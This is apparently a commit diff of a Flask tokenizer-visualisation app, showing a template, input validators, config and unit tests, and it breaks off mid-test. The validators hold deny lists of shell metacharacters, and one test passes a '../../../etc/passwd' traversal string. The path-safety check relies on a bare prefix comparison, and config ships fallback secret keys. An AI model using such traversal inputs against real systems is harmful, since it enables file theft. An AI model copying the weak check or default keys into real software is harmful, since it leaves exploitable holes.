142
+ </span>
143
+ {% if token.newline %}<br>{% endif %}
144
+ {% endfor %}
145
+ {% endif %}
146
+ </div>
147
+ <button class="expand-button" id="expandButton">Show More</button>
148
+ <div class="display-limit-notice" id="displayLimitNotice">
149
+ Note: Only showing first 50,000 tokens. Total token count: <span id="totalTokenCount">0</span>
150
+ </div>
151
+
152
+ <div class="frequency-chart-container" id="frequencyChartContainer" style="display: none;">
153
+ <div class="frequency-chart-title">
154
+ <span>Top Token Frequencies</span>
155
+ <button class="chart-toggle-btn" id="toggleFrequencyChart">Show Chart</button>
156
+ </div>
157
+ <div class="frequency-chart" id="frequencyChart"></div>
158
+ </div>
159
+ </div>
160
+
161
+ <div class="stats-grid">
162
+ <div class="stat-card">
163
+ <div class="stat-title">Total Tokens</div>
164
+ <div class="stat-value" id="totalTokens">{{ token_data.stats.basic_stats.total_tokens if token_data else 0 }}</div>
165
+ <div class="stat-description">
166
+ <span id="uniqueTokens">{{ token_data.stats.basic_stats.unique_tokens if token_data else 0 }} unique</span>
167
+ (<span id="uniquePercentage">{{ token_data.stats.basic_stats.unique_percentage if token_data else 0 }}</span>%)
168
+ </div>
169
+ </div>
170
+ <div class="stat-card">
171
+ <div class="stat-title">Token Types</div>
172
+ <div class="stat-value" id="specialTokens">{{ token_data.stats.basic_stats.special_tokens if token_data else 0 }}</div>
173
+ <div class="stat-description">special tokens</div>
174
+ </div>
175
+ <div class="stat-card">
176
+ <div class="stat-title">Whitespace</div>
177
+ <div class="stat-value" id="spaceTokens">{{ token_data.stats.basic_stats.space_tokens if token_data else 0 }}</div>
178
+ <div class="stat-description">
179
+ spaces: <span id="spaceCount">{{ token_data.stats.basic_stats.space_tokens if token_data else 0 }}</span>,
180
+ newlines: <span id="newlineCount">{{ token_data.stats.basic_stats.newline_tokens if token_data else 0 }}</span>
181
+ </div>
182
+ </div>
183
+ <div class="stat-card">
184
+ <div class="stat-title">Token Length</div>
185
+ <div class="stat-value" id="avgLength">{{ token_data.stats.length_stats.avg_length if token_data else 0 }}</div>
186
+ <div class="stat-description">
187
+ median: <span id="medianLength">{{ token_data.stats.length_stats.median_length if token_data else 0 }}</span>,
188
+ ±<span id="stdDev">{{ token_data.stats.length_stats.std_dev if token_data else 0 }}</span> std
189
+ </div>
190
+ </div>
191
+ <div class="stat-card">
192
+ <div class="stat-title">Compression</div>
193
+ <div class="stat-value" id="compressionRatio">{{ token_data.stats.basic_stats.compression_ratio if token_data else 0 }}</div>
194
+ <div class="stat-description">characters per token</div>
195
+ </div>
196
+ </div>
197
+ </div>
198
+ </div>
199
+ <a href="https://huggingface.co/spaces/bartar/tokenizers" target="_blank" class="watermark">
200
+ @bartar/tokenizers
201
+ </a>
202
+
203
+ <script>
204
+ // Pass server data to client-side JavaScript
205
+ window.tokenizerData = {
206
+ model_type: "{{ model_type if model_type else 'predefined' }}",
207
+ error: "{{ error if error else '' }}",
208
+ tokenizer_info: {{ token_data.tokenizer_info|tojson if token_data and token_data.tokenizer_info else 'null' }}
209
+ };
210
+ </script>
211
+ <script src="{{ url_for('static', filename='js/main.js') }}"></script>
212
+ </body>
213
+ </html>
app/utils/__init__.py ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ """
2
+ Utility functions for Tokenizer Pro
3
+ """
app/utils/validators.py ADDED
@@ -0,0 +1,211 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Validation utilities for security and input validation
3
+ """
4
+ import os
5
+ import re
6
+ from typing import Optional
7
+ from urllib.parse import urlparse
8
+
9
+
10
+ class ValidationError(Exception):
11
+ """Custom exception for validation errors."""
12
+ pass
13
+
14
+
15
+ class Validators:
16
+ """Collection of validation functions for security and input validation."""
17
+
18
+ # Regex patterns for validation - allow numbers, letters, hyphens, underscores, dots
19
+ HUGGINGFACE_MODEL_PATTERN = re.compile(r'^[a-zA-Z0-9_\-\.]+/[a-zA-Z0-9_\-\.]+$')
20
+ SAFE_FILENAME_PATTERN = re.compile(r'^[a-zA-Z0-9_\-\.]+$')
21
+
22
+ @staticmethod
23
+ def validate_model_path(model_path: str) -> bool:
24
+ """
25
+ Validate that a custom model path is safe and follows expected patterns.
26
+
27
+ Args:
28
+ model_path: The model path to validate
29
+
30
+ Returns:
31
+ bool: True if valid, False otherwise
32
+
33
+ Raises:
34
+ ValidationError: If the model path is invalid
35
+ """
36
+ if not model_path or not isinstance(model_path, str):
37
+ raise ValidationError("Model path cannot be empty")
38
+
39
+ # Trim whitespace
40
+ model_path = model_path.strip()
41
+
42
+ # Check for dangerous characters (excluding single forward slash for HuggingFace format)
43
+ dangerous_chars = ['..', '\\', '|', ';', '&', '$', '`', '<', '>']
44
+ if any(char in model_path for char in dangerous_chars):
45
+ raise ValidationError("Model path contains invalid characters")
46
+
47
+ # Check for multiple slashes or leading/trailing slashes
48
+ if '//' in model_path or model_path.startswith('/') or model_path.endswith('/'):
49
+ raise ValidationError("Model path contains invalid characters")
50
+
51
+ # Check if it looks like a HuggingFace model path (user/model format)
52
+ if not Validators.HUGGINGFACE_MODEL_PATTERN.match(model_path):
53
+ raise ValidationError("Model path must follow the format 'organization/model-name'")
54
+
55
+ # Check length limits
56
+ if len(model_path) > 200:
57
+ raise ValidationError("Model path is too long")
58
+
59
+ return True
60
+
61
+ @staticmethod
62
+ def validate_filename(filename: str) -> bool:
63
+ """
64
+ Validate that a filename is safe for upload.
65
+
66
+ Args:
67
+ filename: The filename to validate
68
+
69
+ Returns:
70
+ bool: True if valid, False otherwise
71
+
72
+ Raises:
73
+ ValidationError: If the filename is invalid
74
+ """
75
+ if not filename or not isinstance(filename, str):
76
+ raise ValidationError("Filename cannot be empty")
77
+
78
+ # Check for dangerous characters and patterns
79
+ dangerous_patterns = ['..', '/', '\\', '|', ';', '&', '$', '`', '<', '>']
80
+ if any(pattern in filename for pattern in dangerous_patterns):
81
+ raise ValidationError("Filename contains invalid characters")
82
+
83
+ # Check if filename starts with a dot (hidden files)
84
+ if filename.startswith('.'):
85
+ raise ValidationError("Hidden files are not allowed")
86
+
87
+ # Check length
88
+ if len(filename) > 255:
89
+ raise ValidationError("Filename is too long")
90
+
91
+ return True
92
+
93
+ @staticmethod
94
+ def validate_file_extension(filename: str, allowed_extensions: set) -> bool:
95
+ """
96
+ Validate that a file has an allowed extension.
97
+
98
+ Args:
99
+ filename: The filename to check
100
+ allowed_extensions: Set of allowed extensions (e.g., {'.txt', '.py'})
101
+
102
+ Returns:
103
+ bool: True if valid, False otherwise
104
+
105
+ Raises:
106
+ ValidationError: If the extension is not allowed
107
+ """
108
+ if not filename:
109
+ raise ValidationError("Filename cannot be empty")
110
+
111
+ _, ext = os.path.splitext(filename.lower())
112
+ if ext not in allowed_extensions:
113
+ allowed_list = ', '.join(sorted(allowed_extensions))
114
+ raise ValidationError(f"File type '{ext}' not allowed. Allowed types: {allowed_list}")
115
+
116
+ return True
117
+
118
+ @staticmethod
119
+ def validate_file_size(file_size: int, max_size: int) -> bool:
120
+ """
121
+ Validate that a file size is within limits.
122
+
123
+ Args:
124
+ file_size: Size of the file in bytes
125
+ max_size: Maximum allowed size in bytes
126
+
127
+ Returns:
128
+ bool: True if valid, False otherwise
129
+
130
+ Raises:
131
+ ValidationError: If the file is too large
132
+ """
133
+ if file_size > max_size:
134
+ max_mb = max_size / (1024 * 1024)
135
+ current_mb = file_size / (1024 * 1024)
136
+ raise ValidationError(f"File too large: {current_mb:.1f}MB (max: {max_mb:.1f}MB)")
137
+
138
+ return True
139
+
140
+ @staticmethod
141
+ def validate_text_input(text: str, max_length: int = 1000000) -> bool:
142
+ """
143
+ Validate text input for processing.
144
+
145
+ Args:
146
+ text: The text to validate
147
+ max_length: Maximum allowed length
148
+
149
+ Returns:
150
+ bool: True if valid, False otherwise
151
+
152
+ Raises:
153
+ ValidationError: If the text is invalid
154
+ """
155
+ if not isinstance(text, str):
156
+ raise ValidationError("Text input must be a string")
157
+
158
+ if len(text) > max_length:
159
+ raise ValidationError(f"Text too long: {len(text)} characters (max: {max_length})")
160
+
161
+ return True
162
+
163
+ @staticmethod
164
+ def sanitize_model_path(model_path: str) -> str:
165
+ """
166
+ Sanitize a model path by removing potentially dangerous elements.
167
+
168
+ Args:
169
+ model_path: The model path to sanitize
170
+
171
+ Returns:
172
+ str: Sanitized model path
173
+ """
174
+ if not model_path:
175
+ return ""
176
+
177
+ # Remove whitespace
178
+ sanitized = model_path.strip()
179
+
180
+ # Remove any path traversal attempts
181
+ sanitized = sanitized.replace('..', '')
182
+ sanitized = sanitized.replace('/', '')
183
+ sanitized = sanitized.replace('\\', '')
184
+
185
+ return sanitized
186
+
187
+ @staticmethod
188
+ def is_safe_path(path: str, base_path: str) -> bool:
189
+ """
190
+ Check if a path is safe and within the expected base directory.
191
+
192
+ Args:
193
+ path: The path to check
194
+ base_path: The base directory that the path should be within
195
+
196
+ Returns:
197
+ bool: True if the path is safe, False otherwise
198
+ """
199
+ try:
200
+ # Resolve both paths to absolute paths
201
+ abs_path = os.path.abspath(path)
202
+ abs_base = os.path.abspath(base_path)
203
+
204
+ # Check if the path is within the base directory
205
+ return abs_path.startswith(abs_base)
206
+ except (OSError, ValueError):
207
+ return False
208
+
209
+
210
+ # Global instance
211
+ validators = Validators()
config.py ADDED
@@ -0,0 +1,66 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ from dataclasses import dataclass, field
3
+ from typing import List
4
+
5
+ @dataclass
6
+ class Config:
7
+ """Centralized configuration for Tokenizer Pro application."""
8
+
9
+ # Flask settings
10
+ SECRET_KEY: str = os.getenv('SECRET_KEY', 'tokenizer-pro-secret-key-change-in-production')
11
+ DEBUG: bool = os.getenv('DEBUG', 'False').lower() in ('true', '1', 'yes')
12
+
13
+ # File upload settings
14
+ MAX_CONTENT_LENGTH: int = int(os.getenv('MAX_CONTENT_LENGTH', 25 * 1024 * 1024)) # 25MB
15
+ UPLOAD_FOLDER: str = os.getenv('UPLOAD_FOLDER', '/tmp/tokenizer_uploads')
16
+ ALLOWED_EXTENSIONS: List[str] = field(default_factory=lambda: ['txt', 'md', 'py', 'js', 'html', 'css', 'json', 'xml', 'csv'])
17
+
18
+ # Tokenizer caching settings
19
+ CACHE_SIZE: int = int(os.getenv('CACHE_SIZE', 10))
20
+ CACHE_EXPIRATION: int = int(os.getenv('CACHE_EXPIRATION', 3600)) # 1 hour in seconds
21
+
22
+ # Display limits
23
+ MAX_DISPLAY_TOKENS: int = int(os.getenv('MAX_DISPLAY_TOKENS', 50000))
24
+ PREVIEW_CHAR_LIMIT: int = int(os.getenv('PREVIEW_CHAR_LIMIT', 8096))
25
+
26
+ # Performance settings
27
+ CHUNK_SIZE: int = int(os.getenv('CHUNK_SIZE', 1024 * 1024)) # 1MB chunks for file processing
28
+
29
+ # Security settings
30
+ VALIDATE_MODEL_PATHS: bool = os.getenv('VALIDATE_MODEL_PATHS', 'True').lower() in ('true', '1', 'yes')
31
+ ALLOWED_MODEL_PREFIXES: List[str] = field(default_factory=lambda: [
32
+ 'microsoft/', 'google/', 'meta-llama/', 'mistralai/', 'openai-community/',
33
+ 'Qwen/', 'THUDM/', 'deepseek-ai/', 'unsloth/', 'google-bert/', 'bartar/'
34
+ ])
35
+
36
+ # HuggingFace settings
37
+ HF_HOME: str = os.getenv('HF_HOME', '/tmp/huggingface')
38
+ HF_CACHE_DIR: str = os.getenv('HF_CACHE_DIR', '/tmp/huggingface/cache')
39
+
40
+ # Logging settings
41
+ LOG_LEVEL: str = os.getenv('LOG_LEVEL', 'INFO')
42
+ LOG_FILE: str = os.getenv('LOG_FILE', 'tokenizer_pro.log')
43
+ LOG_MAX_BYTES: int = int(os.getenv('LOG_MAX_BYTES', 10 * 1024 * 1024)) # 10MB
44
+ LOG_BACKUP_COUNT: int = int(os.getenv('LOG_BACKUP_COUNT', 3))
45
+
46
+ class DevelopmentConfig(Config):
47
+ """Development configuration with debug enabled."""
48
+ DEBUG = True
49
+ SECRET_KEY = 'dev-secret-key'
50
+
51
+ class ProductionConfig(Config):
52
+ """Production configuration with enhanced security."""
53
+ DEBUG = False
54
+ SECRET_KEY = os.getenv('SECRET_KEY', None)
55
+
56
+ def __post_init__(self):
57
+ if not self.SECRET_KEY:
58
+ raise ValueError("SECRET_KEY must be set in production environment")
59
+
60
+ class TestingConfig(Config):
61
+ """Testing configuration."""
62
+ TESTING = True
63
+ DEBUG = True
64
+ UPLOAD_FOLDER = '/tmp/test_uploads'
65
+ CACHE_SIZE = 2
66
+ MAX_DISPLAY_TOKENS = 100
pytest.ini ADDED
@@ -0,0 +1,13 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ [tool:pytest]
2
+ testpaths = tests
3
+ python_files = test_*.py
4
+ python_classes = Test*
5
+ python_functions = test_*
6
+ addopts = -v --tb=short --strict-markers
7
+ markers =
8
+ slow: marks tests as slow (deselect with '-m "not slow"')
9
+ integration: marks tests as integration tests
10
+ unit: marks tests as unit tests
11
+ filterwarnings =
12
+ ignore::DeprecationWarning
13
+ ignore::PendingDeprecationWarning
requirements.txt ADDED
@@ -0,0 +1,7 @@
 
 
 
 
 
 
 
 
1
+ flask>=2.3.0
2
+ transformers>=4.30.0
3
+ torch>=2.0.0
4
+ werkzeug>=2.3.0
5
+ psutil>=5.9.0
6
+ pytest>=7.0.0
7
+ pytest-flask>=1.2.0
run.py ADDED
@@ -0,0 +1,31 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ Tokenizer Pro - Advanced tokenization analysis and visualization
4
+
5
+ This is the main entry point for the Flask application.
6
+ """
7
+
8
+ import os
9
+ from app import create_app
10
+ from config import Config, DevelopmentConfig, ProductionConfig
11
+
12
+ def get_config_class():
13
+ """Determine which configuration class to use based on environment."""
14
+ env = os.getenv('FLASK_ENV', 'development').lower()
15
+
16
+ if env == 'production':
17
+ return ProductionConfig
18
+ elif env == 'development':
19
+ return DevelopmentConfig
20
+ else:
21
+ return Config
22
+
23
+ app = create_app(get_config_class())
24
+
25
+ if __name__ == "__main__":
26
+ # Get configuration from environment variables
27
+ host = os.getenv('HOST', '0.0.0.0')
28
+ port = int(os.getenv('PORT', 7860))
29
+ debug = os.getenv('DEBUG', 'False').lower() in ('true', '1', 'yes')
30
+
31
+ app.run(host=host, port=port, debug=debug)
run_tests.py ADDED
@@ -0,0 +1,63 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ Test runner script for Tokenizer Pro
4
+
5
+ Usage:
6
+ python run_tests.py # Run all tests
7
+ python run_tests.py unit # Run only unit tests
8
+ python run_tests.py integration # Run only integration tests
9
+ python run_tests.py --coverage # Run with coverage report
10
+ """
11
+
12
+ import sys
13
+ import subprocess
14
+ import os
15
+
16
+
17
+ def run_command(cmd):
18
+ """Run a command and return the exit code."""
19
+ print(f"Running: {' '.join(cmd)}")
20
+ return subprocess.call(cmd)
21
+
22
+
23
+ def main():
24
+ """Main test runner function."""
25
+ args = sys.argv[1:]
26
+
27
+ # Base pytest command
28
+ pytest_cmd = ["python", "-m", "pytest"]
29
+
30
+ # Parse arguments
31
+ if "--coverage" in args:
32
+ pytest_cmd.extend(["--cov=app", "--cov-report=html", "--cov-report=term"])
33
+ args.remove("--coverage")
34
+
35
+ if "unit" in args:
36
+ pytest_cmd.extend([
37
+ "tests/test_tokenizer_service.py",
38
+ "tests/test_stats_service.py",
39
+ "tests/test_file_service.py",
40
+ "tests/test_validators.py"
41
+ ])
42
+ elif "integration" in args:
43
+ pytest_cmd.append("tests/test_routes.py")
44
+ else:
45
+ # Run all tests
46
+ pytest_cmd.append("tests/")
47
+
48
+ # Add any remaining arguments
49
+ pytest_cmd.extend(args)
50
+
51
+ # Run the tests
52
+ exit_code = run_command(pytest_cmd)
53
+
54
+ if exit_code == 0:
55
+ print("\n✅ All tests passed!")
56
+ else:
57
+ print(f"\n❌ Tests failed with exit code {exit_code}")
58
+
59
+ return exit_code
60
+
61
+
62
+ if __name__ == "__main__":
63
+ sys.exit(main())
tests/__init__.py ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ """
2
+ Test package for Tokenizer Pro
3
+ """
tests/conftest.py ADDED
@@ -0,0 +1,77 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ pytest configuration file
3
+ """
4
+ import pytest
5
+ import os
6
+ import tempfile
7
+ from unittest.mock import Mock, patch
8
+ from flask import Flask
9
+
10
+ # Add the parent directory to Python path so we can import the app
11
+ import sys
12
+ sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
13
+
14
+ from app import create_app
15
+ from config import TestingConfig
16
+
17
+
18
+ @pytest.fixture
19
+ def app():
20
+ """Create a test Flask application."""
21
+ app = create_app(TestingConfig())
22
+
23
+ # Create a temporary directory for file uploads during testing
24
+ with tempfile.TemporaryDirectory() as temp_dir:
25
+ app.config['UPLOAD_FOLDER'] = temp_dir
26
+ app.config['TESTING'] = True
27
+ yield app
28
+
29
+
30
+ @pytest.fixture
31
+ def client(app):
32
+ """Create a test client."""
33
+ return app.test_client()
34
+
35
+
36
+ @pytest.fixture
37
+ def mock_tokenizer():
38
+ """Create a mock tokenizer for testing."""
39
+ tokenizer = Mock()
40
+ tokenizer.tokenize.return_value = ['Hello', 'world', '!']
41
+ tokenizer.vocab_size = 50257
42
+ tokenizer.model_max_length = 1024
43
+ tokenizer.__class__.__name__ = 'MockTokenizer'
44
+
45
+ # Mock special tokens
46
+ tokenizer.pad_token = '<pad>'
47
+ tokenizer.eos_token = '</s>'
48
+ tokenizer.unk_token = '<unk>'
49
+ tokenizer.bos_token = '<s>'
50
+
51
+ return tokenizer
52
+
53
+
54
+ @pytest.fixture
55
+ def sample_text():
56
+ """Sample text for testing."""
57
+ return "Hello world! This is a test."
58
+
59
+
60
+ @pytest.fixture
61
+ def sample_tokens():
62
+ """Sample tokens for testing."""
63
+ return ['Hello', ' world', '!', ' This', ' is', ' a', ' test', '.']
64
+
65
+
66
+ @pytest.fixture
67
+ def temp_file():
68
+ """Create a temporary file for testing."""
69
+ with tempfile.NamedTemporaryFile(mode='w', suffix='.txt', delete=False) as f:
70
+ f.write("Hello world! This is a test file.")
71
+ temp_path = f.name
72
+
73
+ yield temp_path
74
+
75
+ # Cleanup
76
+ if os.path.exists(temp_path):
77
+ os.unlink(temp_path)
tests/test_file_service.py ADDED
@@ -0,0 +1,294 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Unit tests for FileService
3
+ """
4
+ import pytest
5
+ import os
6
+ import tempfile
7
+ from unittest.mock import Mock, patch, mock_open
8
+ from werkzeug.datastructures import FileStorage
9
+ from io import BytesIO
10
+ from app.services.file_service import FileService
11
+
12
+
13
+ class TestFileService:
14
+ """Test cases for FileService."""
15
+
16
+ def setup_method(self):
17
+ """Set up test fixtures."""
18
+ self.service = FileService()
19
+
20
+ def test_is_allowed_file_valid_extensions(self):
21
+ """Test allowed file extension checking."""
22
+ # Valid extensions
23
+ assert self.service.is_allowed_file('test.txt') is True
24
+ assert self.service.is_allowed_file('document.md') is True
25
+ assert self.service.is_allowed_file('script.py') is True
26
+ assert self.service.is_allowed_file('code.js') is True
27
+ assert self.service.is_allowed_file('data.json') is True
28
+ assert self.service.is_allowed_file('styles.css') is True
29
+ assert self.service.is_allowed_file('page.html') is True
30
+ assert self.service.is_allowed_file('data.csv') is True
31
+ assert self.service.is_allowed_file('app.log') is True
32
+
33
+ def test_is_allowed_file_invalid_extensions(self):
34
+ """Test invalid file extensions."""
35
+ # Invalid extensions
36
+ assert self.service.is_allowed_file('virus.exe') is False
37
+ assert self.service.is_allowed_file('archive.zip') is False
38
+ assert self.service.is_allowed_file('image.jpg') is False
39
+ assert self.service.is_allowed_file('document.pdf') is False
40
+ assert self.service.is_allowed_file('data.xlsx') is False
41
+
42
+ def test_is_allowed_file_edge_cases(self):
43
+ """Test edge cases for file extension checking."""
44
+ # Empty filename
45
+ assert self.service.is_allowed_file('') is False
46
+ assert self.service.is_allowed_file(None) is False
47
+
48
+ # No extension
49
+ assert self.service.is_allowed_file('filename') is False
50
+
51
+ # Multiple dots
52
+ assert self.service.is_allowed_file('file.backup.txt') is True
53
+
54
+ # Case sensitivity
55
+ assert self.service.is_allowed_file('FILE.TXT') is True
56
+ assert self.service.is_allowed_file('Document.MD') is True
57
+
58
+ def test_generate_secure_filename_basic(self):
59
+ """Test basic secure filename generation."""
60
+ filename = self.service.generate_secure_filename('test.txt')
61
+
62
+ assert filename.endswith('_test.txt')
63
+ assert len(filename) > len('test.txt') # Should have UUID prefix
64
+
65
+ # Should be different each time
66
+ filename2 = self.service.generate_secure_filename('test.txt')
67
+ assert filename != filename2
68
+
69
+ def test_generate_secure_filename_special_characters(self):
70
+ """Test secure filename with special characters."""
71
+ # Test filename with spaces and special chars
72
+ filename = self.service.generate_secure_filename('my file name.txt')
73
+ assert 'my_file_name.txt' in filename
74
+
75
+ # Test with path separators (should be removed)
76
+ filename = self.service.generate_secure_filename('../../../etc/passwd')
77
+ assert '..' not in filename
78
+ assert '/' not in filename
79
+ assert '\\' not in filename
80
+
81
+ def test_generate_secure_filename_empty_input(self):
82
+ """Test secure filename generation with empty input."""
83
+ filename = self.service.generate_secure_filename('')
84
+ assert filename.endswith('.txt')
85
+ assert len(filename) > 4 # Should have UUID
86
+
87
+ filename = self.service.generate_secure_filename(None)
88
+ assert filename.endswith('.txt')
89
+ assert len(filename) > 4
90
+
91
+ @patch('os.makedirs')
92
+ def test_save_uploaded_file_basic(self, mock_makedirs, temp_file):
93
+ """Test basic file upload saving."""
94
+ # Create a mock uploaded file
95
+ file_content = b"Hello world!"
96
+ uploaded_file = FileStorage(
97
+ stream=BytesIO(file_content),
98
+ filename='test.txt',
99
+ content_type='text/plain'
100
+ )
101
+
102
+ upload_folder = '/tmp/test_uploads'
103
+
104
+ with patch('builtins.open', mock_open()) as mock_file:
105
+ file_path = self.service.save_uploaded_file(uploaded_file, upload_folder)
106
+
107
+ # Check that directory creation was attempted
108
+ mock_makedirs.assert_called_once_with(upload_folder, exist_ok=True)
109
+
110
+ # Check that file path has correct structure
111
+ assert file_path.startswith(upload_folder)
112
+ assert file_path.endswith('_test.txt')
113
+
114
+ def test_cleanup_file_existing(self, temp_file):
115
+ """Test cleanup of existing file."""
116
+ # Verify file exists
117
+ assert os.path.exists(temp_file)
118
+
119
+ # Cleanup
120
+ self.service.cleanup_file(temp_file)
121
+
122
+ # Verify file is deleted
123
+ assert not os.path.exists(temp_file)
124
+
125
+ def test_cleanup_file_nonexistent(self):
126
+ """Test cleanup of non-existent file (should not raise error)."""
127
+ # Should not raise an exception
128
+ self.service.cleanup_file('/path/that/does/not/exist.txt')
129
+
130
+ @patch('app.services.file_service.tokenizer_service')
131
+ @patch('app.services.file_service.stats_service')
132
+ def test_process_file_for_tokenization_basic(self, mock_stats, mock_tokenizer, temp_file):
133
+ """Test basic file processing for tokenization."""
134
+ # Mock tokenizer service
135
+ mock_tokenizer_obj = Mock()
136
+ mock_tokenizer_obj.tokenize.return_value = ['Hello', ' world', '!']
137
+ mock_tokenizer.load_tokenizer.return_value = (mock_tokenizer_obj, {}, None)
138
+
139
+ # Mock stats service
140
+ mock_stats.get_token_stats.return_value = {
141
+ 'basic_stats': {'total_tokens': 3},
142
+ 'length_stats': {'avg_length': '2.0'}
143
+ }
144
+ mock_stats.format_tokens_for_display.return_value = [
145
+ {'display': 'Hello', 'original': 'Hello', 'token_id': 1, 'colors': {}, 'newline': False}
146
+ ]
147
+
148
+ result = self.service.process_file_for_tokenization(
149
+ file_path=temp_file,
150
+ model_id_or_name='gpt2',
151
+ preview_char_limit=1000,
152
+ max_display_tokens=100,
153
+ chunk_size=1024
154
+ )
155
+
156
+ assert isinstance(result, dict)
157
+ assert 'tokens' in result
158
+ assert 'stats' in result
159
+ assert 'display_limit_reached' in result
160
+ assert 'total_tokens' in result
161
+ assert 'preview_only' in result
162
+ assert 'tokenizer_info' in result
163
+
164
+ @patch('app.services.file_service.tokenizer_service')
165
+ def test_process_file_tokenizer_error(self, mock_tokenizer, temp_file):
166
+ """Test file processing with tokenizer error."""
167
+ # Mock tokenizer service to return error
168
+ mock_tokenizer.load_tokenizer.return_value = (None, {}, "Tokenizer error")
169
+
170
+ with pytest.raises(Exception) as excinfo:
171
+ self.service.process_file_for_tokenization(
172
+ file_path=temp_file,
173
+ model_id_or_name='invalid-model',
174
+ preview_char_limit=1000,
175
+ max_display_tokens=100
176
+ )
177
+
178
+ assert "Tokenizer error" in str(excinfo.value)
179
+
180
+ @patch('app.services.file_service.tokenizer_service')
181
+ @patch('app.services.file_service.stats_service')
182
+ def test_process_text_for_tokenization_basic(self, mock_stats, mock_tokenizer):
183
+ """Test basic text processing for tokenization."""
184
+ # Mock tokenizer service
185
+ mock_tokenizer_obj = Mock()
186
+ mock_tokenizer_obj.tokenize.return_value = ['Hello', ' world']
187
+ mock_tokenizer.load_tokenizer.return_value = (mock_tokenizer_obj, {'vocab_size': 1000}, None)
188
+
189
+ # Mock stats service
190
+ mock_stats.get_token_stats.return_value = {
191
+ 'basic_stats': {'total_tokens': 2},
192
+ 'length_stats': {'avg_length': '3.0'}
193
+ }
194
+ mock_stats.format_tokens_for_display.return_value = [
195
+ {'display': 'Hello', 'original': 'Hello', 'token_id': 1, 'colors': {}, 'newline': False},
196
+ {'display': ' world', 'original': ' world', 'token_id': 2, 'colors': {}, 'newline': False}
197
+ ]
198
+
199
+ result = self.service.process_text_for_tokenization(
200
+ text="Hello world",
201
+ model_id_or_name='gpt2',
202
+ max_display_tokens=100
203
+ )
204
+
205
+ assert isinstance(result, dict)
206
+ assert 'tokens' in result
207
+ assert 'stats' in result
208
+ assert result['display_limit_reached'] is False
209
+ assert result['total_tokens'] == 2
210
+ assert result['tokenizer_info']['vocab_size'] == 1000
211
+
212
+ @patch('app.services.file_service.tokenizer_service')
213
+ @patch('app.services.file_service.stats_service')
214
+ def test_process_text_display_limit(self, mock_stats, mock_tokenizer):
215
+ """Test text processing with display limit."""
216
+ # Create a large number of tokens
217
+ tokens = [f'token{i}' for i in range(200)]
218
+
219
+ # Mock tokenizer service
220
+ mock_tokenizer_obj = Mock()
221
+ mock_tokenizer_obj.tokenize.return_value = tokens
222
+ mock_tokenizer.load_tokenizer.return_value = (mock_tokenizer_obj, {}, None)
223
+
224
+ # Mock stats service
225
+ mock_stats.get_token_stats.return_value = {
226
+ 'basic_stats': {'total_tokens': 200},
227
+ 'length_stats': {'avg_length': '6.0'}
228
+ }
229
+ mock_stats.format_tokens_for_display.return_value = []
230
+
231
+ result = self.service.process_text_for_tokenization(
232
+ text="Long text",
233
+ model_id_or_name='gpt2',
234
+ max_display_tokens=100 # Limit lower than token count
235
+ )
236
+
237
+ assert result['display_limit_reached'] is True
238
+ assert result['total_tokens'] == 200
239
+
240
+ @patch('app.services.file_service.tokenizer_service')
241
+ def test_process_text_tokenizer_error(self, mock_tokenizer):
242
+ """Test text processing with tokenizer error."""
243
